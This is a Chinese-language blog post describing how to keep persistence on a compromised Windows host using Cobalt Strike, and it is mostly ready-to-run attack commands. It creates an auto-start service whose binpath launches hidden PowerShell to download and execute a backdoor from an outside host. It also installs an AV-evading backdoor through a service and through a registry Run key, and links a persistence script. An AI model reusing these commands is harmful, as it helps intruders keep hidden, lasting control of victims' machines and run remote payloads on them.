Cobalt Strike权限维持
This_is_Y Lv6

来自之前cnblog的博客
源地址:https://www.cnblogs.com/This-is-Y/p/13763667.html

比较菜,目前需要上线的目标是system权限

1、sc创建自启动服务

以下命令都是在cs中执行的,在cmd中测试只需要删掉前面的shell就行

先创建一个服务(需要system权限)

shell sc create “shell” binpath= “cmd /c start powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(‘http://192.168.123.54/后门文件'))\""

 

 

 因为是拿自己的电脑测试的,直接用win+r启动services.msc来查看服务状态确认一下,此时还是手动的。

 

 

 设置自启动

shell sc config “shell” start= auto

设置描述

shell sc description “shell” “shell persistence”

启动服务

shell net start “shell”

删除服务

shell sc delete “shell”

 

如果没有公网IP,也可以上传一个免杀后门到目标上,也是使用sc配置一个自启动服务来进行权限维持  

sc create “shell_local” binpath= “C:\Users\Public\BypassAV.exe(文件路径)”

sc description “shell_local” “shell_local_persistence”

sc config “shell_local” start= auto

net start “shell_local”

 

2、注册表自启动

同样需要先需要上传一个免杀后门

命令shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “shell_regedit” /t REG_SZ /d “C:\Users\Public\BypassAV.exe(文件路径)” /f

要删除也简单shell reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “shell_regedit”

 当然、也可以采用插件

https://github.com/ZonkSec/persistence-aggressor-script


 

 

 评论
评论插件加载失败
正在加载评论插件
由 Hexo 驱动 & 主题 Keep
访客数 访问量